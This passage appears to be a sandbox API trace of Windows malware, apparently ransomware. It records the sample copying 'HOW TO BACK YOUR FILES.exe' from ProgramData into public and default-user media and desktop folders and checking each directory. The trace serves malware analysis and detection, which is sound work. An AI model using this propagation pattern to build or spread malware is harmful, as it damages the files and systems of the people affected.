52 [0078.505] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents\\My Videos" | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Videos") returned="C:\\Documents and Settings\\Public\\Documents\\My Videos" [0078.505] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.505] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\My Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\my videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.506] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.506] GetLastError () returned 0x0 [0078.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.506] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.506] CloseHandle (hObject=0x118) returned 1 [0078.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.506] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.506] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\My Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49627e40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49627e40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.507] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.507] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.507] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos") returned="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos" [0078.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0078.507] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0078.507] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos") returned 66 [0078.507] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos" | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos") returned="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos" [0078.507] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.507] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\my videos\\sample videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.508] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.508] GetLastError () returned 0x0 [0078.508] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.508] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.508] CloseHandle (hObject=0x118) returned 1 [0078.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.508] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.508] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\My Videos\\Sample Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x499b9f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x499b9f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.508] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.508] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.508] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents\\My Pictures", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Pictures") returned="C:\\Documents and Settings\\Public\\Documents\\My Pictures" [0078.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.508] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0078.508] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents\\My Pictures") returned 54 [0078.508] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Pictures") returned="C:\\Documents and Settings\\Public\\Documents\\My Pictures" [0078.508] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.509] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\my pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.509] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.509] GetLastError () returned 0x0 [0078.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.509] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.510] CloseHandle (hObject=0x118) returned 1 [0078.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.510] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.510] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b96a420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b96a420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.510] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.510] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.510] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures" [0078.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0078.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0078.510] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures") returned 70 [0078.510] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures" | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures") returned="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures" [0078.510] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.510] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\my pictures\\sample pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.511] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.511] GetLastError () returned 0x0 [0078.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.511] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.511] CloseHandle (hObject=0x118) returned 1 [0078.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.511] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.511] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\My Pictures\\Sample Pictures\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.511] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.511] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.512] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents\\My Music", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Music") returned="C:\\Documents and Settings\\Public\\Documents\\My Music" [0078.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0078.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0078.512] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents\\My Music") returned 51 [0078.512] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents\\My Music" | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Music") returned="C:\\Documents and Settings\\Public\\Documents\\My Music" [0078.512] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.512] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\My Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\my music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.512] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.512] GetLastError () returned 0x0 [0078.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.513] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.513] CloseHandle (hObject=0x118) returned 1 [0078.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.513] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.513] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\My Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4f6697e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f6697e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.513] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.513] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.513] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music") returned="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music" [0078.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0078.513] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0078.513] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music") returned 64 [0078.513] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music" | out: lpString1="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music") returned="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music" [0078.513] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.513] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\documents\\my music\\sample music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.514] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.514] GetLastError () returned 0x0 [0078.514] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.514] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.514] CloseHandle (hObject=0x118) returned 1 [0078.514] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.514] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.514] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Documents\\My Music\\Sample Music\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x521b4800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x521b4800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.514] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.515] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.515] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Public\\Desktop", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Public\\Desktop") returned="C:\\Documents and Settings\\Public\\Desktop" [0078.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df710 | out: hHeap=0x2b0000) returned 1 [0078.515] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0078.515] lstrlenW (lpString="C:\\Documents and Settings\\Public\\Desktop") returned 40 [0078.515] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Public\\Desktop" | out: lpString1="C:\\Documents and Settings\\Public\\Desktop") returned="C:\\Documents and Settings\\Public\\Desktop" [0078.515] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.515] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Public\\Desktop\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\public\\desktop\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.515] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.515] GetLastError () returned 0x0 [0078.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.516] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.516] CloseHandle (hObject=0x118) returned 1 [0078.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.516] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.516] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Public\\Desktop\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53c55e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53c55e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.516] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.516] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.516] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User") returned="C:\\Documents and Settings\\Default User" [0078.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0078.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0078.516] lstrlenW (lpString="C:\\Documents and Settings\\Default User") returned 38 [0078.516] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User" | out: lpString1="C:\\Documents and Settings\\Default User") returned="C:\\Documents and Settings\\Default User" [0078.516] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.516] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.517] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.517] GetLastError () returned 0x0 [0078.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.517] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.517] CloseHandle (hObject=0x118) returned 1 [0078.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.517] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.517] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x540cc760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x540cc760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.518] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.518] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.518] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Videos", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Videos") returned="C:\\Documents and Settings\\Default User\\Videos" [0078.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2578 | out: hHeap=0x2b0000) returned 1 [0078.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23e0 | out: hHeap=0x2b0000) returned 1 [0078.518] lstrlenW (lpString="C:\\Documents and Settings\\Default User\\Videos") returned 45 [0078.518] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Videos" | out: lpString1="C:\\Documents and Settings\\Default User\\Videos") returned="C:\\Documents and Settings\\Default User\\Videos" [0078.518] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.518] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Videos\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\videos\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.518] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.519] GetLastError () returned 0x0 [0078.519] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.519] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.519] CloseHandle (hObject=0x118) returned 1 [0078.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0078.519] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.519] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Videos\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x54118a20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54118a20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.519] lstrcmpiW (lpString1=".", 